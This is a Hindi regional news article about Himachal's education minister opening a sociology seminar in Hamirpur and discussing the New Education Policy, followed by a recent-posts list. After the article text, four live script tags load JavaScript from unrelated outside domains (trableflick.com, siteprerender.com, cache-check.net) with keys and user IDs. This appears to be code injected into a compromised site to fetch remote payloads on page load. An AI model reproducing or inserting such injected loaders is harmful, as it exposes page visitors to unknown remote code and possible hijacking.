Categories: हिमाचल

हमीरपुरः दो दिवसीय सेमिनार एवं वेबिनार के उदघाटन सत्र में शिक्षा मंत्री ने शिक्षकों से की अपील

<p>शिक्षा, भाषा, कला एवं संस्कृति मंत्री गोविंद सिंह ठाकुर ने राजकीय स्नातकोत्तर महाविद्यालय हमीरपुर में समाज शास्त्र पर दो दिवसीय अंतर्राष्ट्रीय सेमिनार एवं वेबिनार के उदघाटन सत्र की अध्यक्षता की। दो दिवसीय अंतर्राष्ट्रीय सेमिनार एवं वेबिनार के उदघाटन सत्र की अध्यक्षता को संबोधित करते हुए गोविंद सिंह ने यह अपील की है कि भारत को वैश्विक महाशक्ति बनाने की दिशा में एक मजबूत आधार तैयार करने के लिए केंद्र सरकार नई शिक्षा नीति लेकर आई है। इसमें शैक्षणिक, सामाजिक, आर्थिक और अन्य सभी पहलुओं के समावेश के साथ-साथ शिक्षक को सबसे महत्वपूर्ण स्थान दिया गया है। 21वीं सदी की शिक्षा नीति के विभिन्न प्रावधानों को तेजी से लागू करने के लिए सभी शिक्षक इस महत्वपूर्ण दस्तावेज का गहन अध्ययन करें और अपने सुझाव भी दें। सोशियोलॉजिकल सोसाइटी हिमाचल प्रदेश एवं हमीरपुर कालेज के समाज शास्त्र विभाग के संयुक्त तत्वावधान में आयोजित इस सेमिनार एवं वेबिनार में देश-विदेश के जाने-माने समाज शास्त्री, शिक्षक और रिसर्च स्कॉलर्स प्रत्यक्ष या वर्चुअल माध्यम से भाग ले रहे हैं।</p>

<p>शिक्षा मंत्री ने कहा कि महान वैज्ञानिक डॉ. के. कस्तूरीरंगन की अध्यक्षता वाली समिति ने व्यापक मंथन और लाखों शिक्षाविदों के सुझावों के बाद नई शिक्षा नीति का मसौदा तैयार किया है। हिमाचल प्रदेश सरकार ने इसे लागू करने के लिए तेजी से कार्य शुरू कर दिया है। इसके लिए टास्क फोर्स का गठन कर दिया गया है और उप समितियां भी बनाई जा रही हैं। गोविंद सिंह ने कहा कि इस नीति के क्रियान्वयन में शिक्षक सबसे महत्वपूर्ण कड़ी हैं। इसके मद्देनजर सरकार आने वाले समय में दूरदराज के क्षेत्रों में सेवाएं प्रदान करने वाले शिक्षकों को आवास और अन्य आवश्यक सुविधाएं मुहैया करवाने पर विचार करेगी और शिक्षकों पर प्रशासनिक भार कम करेगी। कोरोना संकट के दौरान विद्यार्थियों को ऑनलाइन माध्यम से शिक्षा मुहैया करवाने में हिमाचल के शिक्षकों ने बहुत ही सराहनीय कार्य किया है। आने वाले दिनों में सेकेंडरी स्तर की कक्षाएं आरंभ करने के लिए प्रदेश सरकार उचित समय पर निर्णय लेगी। इसके लिए ऑनलाइन माध्यम से बच्चों के अभिभावकों के साथ ई-पीटीएम की गई हैं।</p>

<p><img src=”/media/gallery/images/image(1384).png” style=”height:110px; width:900px” /></p>

<p>समाज शास्त्र विषय की चर्चा करते हुए गोविंद सिंह ने कहा कि यह हमारी शिक्षा व्यवस्था ही नहीं, बल्कि प्रत्यक्ष रूप से हमारे समाज और आम जन-जीवन से जुड़ा हुआ विषय है। नई शिक्षा नीति के प्रावधानों के अनुसार स्कूल एवं कालेज पाठ्यक्रम में इसके समावेश की संभावनाएं तलाशी जाएंगी। कार्यक्रम के दौरान शिक्षा मंत्री सेमिनार की स्मारिका का विमोचन किया और सभी प्रतिभागियों तथा अन्य लोगों को कोरोना संकट से निपटने की शपथ भी दिलाई। सेमिनार एवं वेबिनार के विशिष्ट अतिथि हिमाचल प्रदेश विधानसभा के उपाध्यक्ष हंसराज ने भी उदघाटन सत्र को संबोधित करते हुए कहा कि समाज शास्त्र को सभी विषयों की जननी कहा जाता है। बच्चों के सर्वांगीण विकास और राष्ट्र निर्माण एवं समाज में उनका योगदान सुनिश्चित करने के लिए स्कूली पाठ्यक्रम में भी समाज शास्त्र का समावेश किया जाना आवश्यक है।</p>

<p>विधानसभा उपाध्यक्ष ने कहा कि शिक्षा का अर्थ केवल डिग्रियां हासिल करना ही नहीं होता है। बच्चों के सर्वांगीण विकास के साथ-साथ उन्हें समाज के साथ जोडऩा और उन्हें संस्कारित शिक्षा देना भी अति आवश्यक है। हंसराज ने कहा कि नई शिक्षा नीति में इन सभी पहलुओं का विशेष ध्यान रखा गया है। इसमें मल्टी एंट्री और मल्टी एग्जिट का प्रावधान करके सरकार ने विद्यार्थियों को एक साथ कई विकल्प प्रदान किए हैं। विधानसभा उपाध्यक्ष ने कहा कि नई शिक्षा नीति देश और समाज को आगे ले जाने में एक मील का पत्थर साबित होगी। उन्होंने उम्मीद जताई कि इस दो दिन के सेमिनार के विभिन्न सत्रों में शिक्षा एवं समाज शास्त्र से जुड़े कई विषयों पर व्यापक मंथन होगा और देश-विदेश के विद्वान एवं शिक्षाविद अपने बेहतरीन शोध पत्र एवं सुझाव प्रस्तुत करेंगे।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1602934654876″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

लेह-दिल्ली रूट पर एचआरटीसी की बस सेवा बंद, जून 2025 तक बहाल होगा रूट

  अब यात्रियों को मनाली-केलांग-लेह के बीच टैक्सियों में मंहगा सफर करना पड़ेगा Shimla :एचआरटीसी…

13 hours ago

चिकन की दुकानों में स्वच्छता के नियम दरकिनार

  Hamirpur:जिला खाद्य सुरक्षा विभाग द्वारा किए गए चिकन की दुकानों के निरीक्षण में स्वच्छता…

14 hours ago

रैगिंग के आरोपी विद्यार्थी की बिना वारंट के होगी गिरफ्तारी, हो सकती है तीन साल की सजा

  Hamirpur:होटल प्रंबधन संस्थान (आईएचएम) हमीरपुर की एंटी रैगिंग समिति की बैठक वीरवार को संस्थान…

14 hours ago

कोट और मटाहणी स्कूल की छात्राओं को समझाया तनाव प्रबंधन

  Hamirpur: महिला एवं बाल विकास विभाग ने वीरवार को राजकीय वरिष्ठ माध्यमिक पाठशाला कोट…

14 hours ago

लक्ष्य तय करें और उसके लिए कड़ी मेहनत करें

एसडीएम संजय स्वरूप ने बाहनवीं स्कूल के विद्यार्थियों को दी नसीहत महिला एवं बाल विकास…

14 hours ago

Nahan: NSUI ने दिल्ली गेट के समीप फूंका मंत्री रवनीत सिंह बिट्टू का पुतला

नेता प्रतिपक्ष राहुल गांधी के खिलाफ बीजेपी के मंत्री ने की थी बयान बाजी मंत्री…

16 hours ago